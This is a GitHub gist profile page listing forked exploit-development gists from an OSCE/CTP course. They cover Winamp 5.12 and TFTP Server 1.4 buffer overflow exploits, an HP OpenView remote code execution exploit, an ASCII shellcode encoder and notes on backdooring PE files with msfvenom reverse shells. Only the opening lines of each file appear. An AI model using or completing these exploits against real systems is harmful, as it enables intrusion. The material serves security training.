James Milazzo JamesMilazzo

View GitHub Profile
@JamesMilazzo
JamesMilazzo / winamp-5.12-unc-exploit.pl
Created March 25, 2018 01:20 — forked from mgeeky/winamp-5.12-unc-exploit.pl
My version of the Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit, for occasion of OSCE/CTP course. Original PoC by Umesh Wanve (umesh_345@yahoo.com).
#!/usr/bin/perl -w
# ====================================================================
# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
# Original PoC by Umesh Wanve (umesh_345@yahoo.com)
# Exploit crafted by Mariusz B. / mgeeky (for occasion of OSCE/CTP, 2017)
# ====================================================================
$start = "[playlist]\r\nFile1=\\\\";
$egg = "T00WT00W";
@JamesMilazzo
JamesMilazzo / cve2008-1611.py
Created March 25, 2018 01:19 — forked from mgeeky/cve2008-1611.py
Exploit for the CVE-2008-1611 TFTP Server 1.4 ST RRQ/WRQ packet's filename stack-based overflow with SEH overwrite.
#!/usr/bin/python
import socket
import struct
HOST = '192.168.1.100'
PORT = 69
def send_packet(filename):
#
@JamesMilazzo
JamesMilazzo / printable.sh
Created March 25, 2018 01:19 — forked from mgeeky/printable.sh
One liner determining whether Metasploit's msfpescan's output addresses are printable (contain only ascii characters) or not.
#!/bin/bash
# Consider having following input gathered from Metasploit's msfpescan utility (msfpescan -M -p dump/ ):
# bash$ cat msfpescan.log
#
# [./6d210000.rng]
# 0x6d21185f pop edi; pop esi; ret
# 0x6d213ba2 pop esi; pop ebp; ret
# 0x6d213d2b pop esi; pop ebp; ret
# 0x6d213f03 pop edi; pop esi; ret
# 0x6d2140bf pop ebx; pop ebp; ret
@JamesMilazzo
JamesMilazzo / ascii-shellcode-encoder.py
Created March 25, 2018 01:19 — forked from mgeeky/ascii-shellcode-encoder.py
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's subtract arguments finding algorithm.
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives the program a binary encoded shellcode on its input,
# and it yields its ASCII encoded form on the output.
#
# This payload will at the beginning align the stack by firstly moving
@JamesMilazzo
JamesMilazzo / hp-openview-exploit.py
Created March 25, 2018 01:17 — forked from mgeeky/hp-openview-exploit.py
HP OpenView NNM B.07.50 Remote Code Execution exploit with ASCII encoded egghunter, JO/JNO jump-over-SEH trick and stack aligned. Written during OSCE/CTP course.
#!/usr/bin/python
# HP OpenView NNM B.07.50 Remote Code Execution exploit
# by Mariusz B. / mgeeky, 17'
import struct
import socket
HOST = '192.168.XXX.YYY'
PORT = 7510
@JamesMilazzo
JamesMilazzo / msfvenom-reverse-tcp-WaitForSingleObject.md
Created March 25, 2018 01:15 — forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It was written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching the problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

### Keybase proof
I hereby claim:
* I am JamesMilazzo on github.
* I am zo (https://keybase.io/zo) on keybase.
* I have a public key whose fingerprint is 39D5 BF1A A497 63A7 370E 7498 26A7 2F7A 1991 E084
To claim this, I am signing this object: